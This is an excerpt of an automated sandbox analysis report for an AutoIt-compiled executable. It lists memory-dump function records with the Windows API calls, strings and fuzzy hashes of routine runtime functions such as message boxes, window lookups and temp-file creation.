                                                                                                                        • Instruction Fuzzy Hash: E901F572900218BEDB28D7A8C816EFE7BF8DB05311F00419AE193D2281E5B4E708CB70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DCC4E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                        • Opcode ID: 868dc670220912e00398bfd1f4a87ceb47e3954201bd555a5d2a70a8b7f189b6
                                                                                                                        • Instruction ID: a117220dfac7ddd4a377645b080ed113b0a8e98ff8ee5d4f36e0e5dfa57297f6
                                                                                                                        • Opcode Fuzzy Hash: 868dc670220912e00398bfd1f4a87ceb47e3954201bd555a5d2a70a8b7f189b6
                                                                                                                        • Instruction Fuzzy Hash: DD01DFB1651109ABCB08EBA0C962FFF73A8DB01301F14512DFA02F31C1EA10AE0893B1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DCC562
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 1456604079-1403004172
                                                                                                                        • Opcode ID: 8ad3deb9409edb23c75bb788261862b00eeb5331f64027195dbca3c04b81f90d
                                                                                                                        • Instruction ID: 8ba5940f3c54b28ab887946a933e68d42d530442b9b32608e1cbe91fb0e669da
                                                                                                                        • Opcode Fuzzy Hash: 8ad3deb9409edb23c75bb788261862b00eeb5331f64027195dbca3c04b81f90d
                                                                                                                        • Instruction Fuzzy Hash: 8601D1B1A61109ABCB05EBA4C952FFF73ACDB01741F141129FA07F32C1DA54AE09A7B5
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                        • String ID: #32770
                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                        • Opcode ID: ffbbfc2d67c7a462cafd06ed696e5fa035e214238ea0b2b5156e01131fe6d9be
                                                                                                                        • Instruction ID: 9091954c90131c990bee8758ac9691344b71bddb3c6b03c98dfeb432be5498a6
                                                                                                                        • Opcode Fuzzy Hash: ffbbfc2d67c7a462cafd06ed696e5fa035e214238ea0b2b5156e01131fe6d9be
                                                                                                                        • Instruction Fuzzy Hash: 15E0D8376003296BD720EEA6AC0AFE7FBBCEB517A4F000027F924E3141D6709A4587E4
                                                                                                                        APIs
                                                                                                                        • __umatherr.LIBCMT ref: 00DBDA2A
                                                                                                                          • Part of subcall function 00DBDD86: __ctrlfp.LIBCMT ref: 00DBDDE5
                                                                                                                        • __ctrlfp.LIBCMT ref: 00DBDA47
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __ctrlfp$__umatherr
                                                                                                                        • String ID: xn
                                                                                                                        • API String ID: 219961500-2689218296
                                                                                                                        • Opcode ID: 6b8b7429e182eda4c6f82ccae526f686bacc248de0ea481439b942a8988d31d5
                                                                                                                        • Instruction ID: 757d87c389656fa209f5af0e63a361eca90eff6f1f17b14d25fa18d6925db6ec
                                                                                                                        • Opcode Fuzzy Hash: 6b8b7429e182eda4c6f82ccae526f686bacc248de0ea481439b942a8988d31d5
                                                                                                                        • Instruction Fuzzy Hash: B5E06D7540860AEEDB017F80F8066E93BAAEF54320F804094F99C14096EFB284B8D777
                                                                                                                        APIs
                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DCB36B
                                                                                                                          • Part of subcall function 00DB2011: _doexit.LIBCMT ref: 00DB201B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message_doexit
                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                        • Opcode ID: b5e29509650961a208aed12a6acee3c6dd97a5973ef0568f9117aab0d6e5a6c4
                                                                                                                        • Instruction ID: 3d7b22c5142eb52f7f18e80bce39fcb43137d423514498ddb483813a4b0c4b84
                                                                                                                        • Opcode Fuzzy Hash: b5e29509650961a208aed12a6acee3c6dd97a5973ef0568f9117aab0d6e5a6c4
                                                                                                                        • Instruction Fuzzy Hash: 78D0123228835872D21976997C07FD56A888F05B51F544016BF49A61C28AD6958042B9
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00E0BAB8
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E0BCAB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                                                        • String ID: WIN_XPe
                                                                                                                        • API String ID: 510247158-3257408948
                                                                                                                        • Opcode ID: 0a1f24ff5fb07c5aabe3fa0667430839ebc799e76c12da6e9f15c81b4c21d3f6
                                                                                                                        • Instruction ID: b7e9e7386eabb5f5cf0031ee6005589ca9acbfdbf4023d5428424b84d61810ba
                                                                                                                        • Opcode Fuzzy Hash: 0a1f24ff5fb07c5aabe3fa0667430839ebc799e76c12da6e9f15c81b4c21d3f6
                                                                                                                        • Instruction Fuzzy Hash: ADE0C970D0410DEFCB15DBAACC45AECB7B8BB08340F14D49AE122B20A1C7719A84DF31
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DF84DF
                                                                                                                        • PostMessageW.USER32(00000000), ref: 00DF84E6
                                                                                                                          • Part of subcall function 00DD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DD83CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: faefc9c6eff37b03a41161269a1156d439d12e730e48ad95d18d27816cf4a0ab
                                                                                                                        • Instruction ID: d29c5d42cfe548f0f53ef899fe12c9cf052b835039286c502b635e802eb019a5
                                                                                                                        • Opcode Fuzzy Hash: faefc9c6eff37b03a41161269a1156d439d12e730e48ad95d18d27816cf4a0ab
                                                                                                                        • Instruction Fuzzy Hash: 60D0A9323883207BE622AB30AC0BFC66604AB18B10F00096A720ABA2C0C8E0B8048220
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DF849F
                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DF84B2
                                                                                                                          • Part of subcall function 00DD8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DD83CD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 7bc23c78e2f1d2ae32a9727239299326c1068b921890bc7f3dc121a67320aeeb
                                                                                                                        • Instruction ID: 41c91e43c4ece529da54391f32f2057e37d2dbd8b641ef85ffc52c4c9b3b57af
                                                                                                                        • Opcode Fuzzy Hash: 7bc23c78e2f1d2ae32a9727239299326c1068b921890bc7f3dc121a67320aeeb
                                                                                                                        • Instruction Fuzzy Hash: 3ED02232388320BBE721AB30AC0FFC76A04EB14B10F00096A730EBA2C0C8E0B804C330
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00DDD01E
                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00DDD035
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                        • String ID: aut
                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                        • Opcode ID: a21b724c187d2fd244a616a40f9e8cd50b16a81e1b0733d897fc1b8adb2895da
                                                                                                                        • Instruction ID: 3fd62d0a98982c0605d0598795e47e0bd1451e42463a2cc47e794b8124742496
                                                                                                                        • Opcode Fuzzy Hash: a21b724c187d2fd244a616a40f9e8cd50b16a81e1b0733d897fc1b8adb2895da
                                                                                                                        • Instruction Fuzzy Hash: 5BD05EB554430EBFDB10AFA0ED0EF99776CA704704F1081907724E10E1D3B4D649CBA0